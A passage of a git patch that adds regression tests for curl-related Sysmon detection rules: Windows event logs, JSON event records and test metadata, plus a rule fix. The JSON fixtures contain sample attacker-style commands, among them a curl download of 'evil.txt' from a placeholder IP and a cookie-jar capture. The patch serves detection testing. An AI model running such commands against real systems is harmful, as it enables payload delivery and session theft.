From c8b1a0ff67b77718d7030278d8e955f621df9b6b Mon Sep 17 00:00:00 2001 From: Swachchhanda Shrawan Poudel <87493836+swachchhanda000@users.noreply.github.com> Date: Thu, 25 Dec 2025 20:50:48 +0545 Subject: [PATCH] Merge PR #5805 from @swachchhanda000 - Add regression tests for curl-related rules update: Curl Web Request With Potential Custom User-Agent - add another curl supported flag for header chore: add regression tests for curl-related rules --- .../5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx | Bin 0 -> 69632 bytes .../5a6e1e16-07de-48d8-8aae-faa766c05e88.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../85de1f22-d189-44e4-8239-dc276b45379b.evtx | Bin 0 -> 69632 bytes .../85de1f22-d189-44e4-8239-dc276b45379b.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx | Bin 0 -> 69632 bytes .../9cc85849-3b02-4cb5-b371-3a1ff54f2218.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx | Bin 0 -> 69632 bytes .../5cb299fc-5fb1-4d07-b989-0644c68b6043.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx | Bin 0 -> 69632 bytes .../56454143-524f-49fb-b1c6-3fb8b1ad41fb.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx | Bin 0 -> 69632 bytes .../cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx | Bin 0 -> 69632 bytes .../2c1486f5-02e8-4f86-9099-b97f2da4ed77.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx | Bin 0 -> 69632 bytes .../aa6f6ea6-0676-40dd-b510-6e46f02d8867.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ ...roc_creation_win_curl_cookie_hijacking.yml | 1 + ...oc_creation_win_curl_custom_user_agent.yml | 11 ++- ...ation_win_curl_download_direct_ip_exec.yml | 1 + ...url_download_direct_ip_susp_extensions.yml | 1 + ...url_download_susp_file_sharing_domains.yml | 1 + ..._creation_win_curl_insecure_connection.yml | 1 + ...eation_win_curl_insecure_proxy_or_doh.yml} | 1 + ...proc_creation_win_curl_local_file_read.yml | 1 + 32 files changed, 648 insertions(+), 2 deletions(-) create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml rename rules/windows/process_creation/{proc_creation_win_curl_insecure_porxy_or_doh.yml => proc_creation_win_curl_insecure_proxy_or_doh.yml} (85%) diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx new file mode 100755 index 0000000000000000000000000000000000000000..e5eb3a054efc34fcb0d6eb21e4281dc171f9e00c GIT binary patch literal 69632 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 F{1^6BT7dun literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json new file mode 100644 index 000000000..af8f74405 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:22:12.568940Z" + } + }, + "EventRecordID": 21497, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:22:12.498", + "ProcessGuid": "0197231E-6314-693A-D112-000000000800", + "ProcessId": 11000, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl.exe --cookie-jar cookie \"http://example.com\"", + "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000", + "LogonId": "0x3144c", + "TerminalSessionId": 1, + "IntegrityLevel": "High", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800", + "ParentProcessId": 3476, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml new file mode 100644 index 000000000..c5dda047b --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml @@ -0,0 +1,13 @@ +id: d7f159c3-db76-4e39-b677-c0958f5f82b8 +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: 5a6e1e16-07de-48d8-8aae-faa766c05e88 + title: Potential Cookies Session Hijacking +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx new file mode 100755 index 0000000000000000000000000000000000000000..67be7e022fe96077efb1a305db48dabbcb0aabdc GIT binary patch literal 69632 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 V`96!5D&*=Y)vPVJ`$vTi`wyusZms|T literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json new file mode 100644 index 000000000..aea2fe730 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:17:19.772545Z" + } + }, + "EventRecordID": 21475, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:17:19.636", + "ProcessGuid": "0197231E-61EF-693A-C812-000000000800", + "ProcessId": 6400, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl.exe -H \"User-Agent: EvilAgent\" http://example.com", + "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000", + "LogonId": "0x3144c", + "TerminalSessionId": 1, + "IntegrityLevel": "High", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800", + "ParentProcessId": 3476, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml new file mode 100644 index 000000000..f8c2ccdc5 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml @@ -0,0 +1,13 @@ +id: 6428e458-fe2e-4936-accb-aebd0bcc8e35 +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: 85de1f22-d189-44e4-8239-dc276b45379b + title: Curl Web Request With Potential Custom User-Agent +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx new file mode 100644 index 0000000000000000000000000000000000000000..fd2796fb2c69bd09a48040a955e25286919b807c GIT binary patch literal 69632 zcmeI0TWnlc6^7S2bMbiWnX%iNLTN%S5SkD>zKw5bK;yB8gxC;DLkhA~nRpyK8P8a? z-6ljr5l}%ZLCXW`Lm!Iz0xgI)Bve&GLIU23geq}SRe^Ycmr4bNiy~zHf1k5GwreLY zedIr*GiP7cUVH6tt-bb{nXJuM7Hd`8euZ(v4Ln0jm~{l(Mc#A0^zU0Af6q#!KmYKmJ@Deyq2*&C<-ao-&k-$8)$ zy!Fc$zqMIxU)n62G5dSU>@Ug9J!buAKZU;`-tG0;9mYI`IeG2FoV@-S%l{~DXWR2= zo8M;7Cs6-a{3pqM+vZq`b#d%Vad{fD73h3rn;y#S_4;#5Q}T%agQnT^Kb4LhgHH># z;s4n$E*!31ej_LZfwc#3o_y;EekPV5`0Miz9s1MnUcd2D=l7q*N+?z8w6CMc1@d~O zJ!O;jxK*ugtEhhiclvVN`D!6$S8d5^=v+ZZDk$0l#8z$D#_R+>D|QhrRmjYu+=J&L zS{}0oY7Lu*WDn{Mw4bmi&{xN^-+J*GM5)(C@Lk=Qeq~E74A$3Qhp)Wf8V{%Kb9N1y zSKW*V@Y4GF7hsq7=-bybcFxWIIOdvz)MMx!!d>yfc=o$V`!tMQLZ?|iZ$bKzI3A96 zCGC^8=0>8cV1+~}Vbc)%ax8Ikwq+BnGd6*~kK#@<; zq@}}r!qUm0%?_c#NBa9)TkP|(*dj>P(HG|1ESbcf+mDJ5@wwMhHU&ZYs^)}@LZRJ{ z%KdSiPF_#i!_F61oJhzC13Q2Uw*apn?@!xj;6S>Ch&Ww9O)2{@Dt_l&{&mLAqWc>B z)&R#jaHnX>x{|BqAT?vzDbTPhyZy2rvGv&B{)UcGR3D9_tL`DwTMLXW!0R z2^v>nIHP41D~dtODt;2$3u)h8v1en$6xRdpa1GR)upmEV&2~$BkOn3t0xv_aiy5`VA*5gp& zlkoR?GH@r|vIff{gk~RtMB3-$`Kh#>heB$P*VS%!CzAP2JD9Y)Ad1j)HzE}WR!6bm2;(#5-eICx_v#y%)6(E7)l~&$b?PTKs8fH+)|FX1m#|P}*|d4MGNsWKx`Z z8a8iDR^4_1ZFP9L0R}799f#`@>UDc`Wck9epZ~G^v#IpW#b<8){@sp0;r1O-aDPNm z$xIO?@2{L$9q~s7%WW4=J{o-LsbBr){LA;e35QV%KKu=eJau_Ze3b#_llO#EJBxPa z#Zf$Y3Ny~0ZX}VbI4OHSfIH26mw<+BMSFVDX-?m{6 z7E!i4mUXU=G`DRFYM)rcTxbQ3IU0}oU{n7)H^Q8SxrAjXe=wG(_hai*2q_*smtcRG zLm2I9O9iyK%B_hu%%yHKW&-j&-Wb`-8~zG&>D%y$4xc$NWnu|)Ew_Kxx-Pk$)r=0LQQEX)^fl$rU>#vD zA00(L(m&R;pc665ea6?3h#2z}lWVl=qVa_&vIgQ6aL#xIc|;c1U4?xwBt79Ma{Lj{cJ^BlIlT{Me)rh{yn+rx zrWY+^HejQee;Dl}w*T;R!85h7#Ut*t$=D;4hU0R~X11LWGh1G02B2pKyM*Uq4Z5oC z^dCW~4|DLFr+5|fdYJ>U4C_qKUvhbBZ&F^zap?1}U-LQOfWbx?^^32$?$Y*=s4ND;I_rjr#acA((F@clq0&JvT zn?LOQF4{V7FP^7$?)R}P=t~4dKmYKmYKmYKmYKmYKmYKmY zKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmY zKmYKmYKmYKmYKmYKmYKmYKmYKmYKm`7e3H%ovPF?l@ literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json new file mode 100644 index 000000000..b33823434 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T07:02:39.732592Z" + } + }, + "EventRecordID": 21767, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 07:02:39.718", + "ProcessGuid": "0197231E-6C8F-693A-2613-000000000800", + "ProcessId": 17752, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl --output hello.txt https://12.34.56.78/hack/evil.txt", + "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", + "LogonId": "0x317fb", + "TerminalSessionId": 1, + "IntegrityLevel": "Medium", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", + "ParentProcessId": 14736, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml new file mode 100644 index 000000000..73c9feaf9 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml @@ -0,0 +1,13 @@ +id: 6aac357c-fe1d-4ca0-82e2-df626f71e838 +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218 + title: File Download From IP URL Via Curl.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx 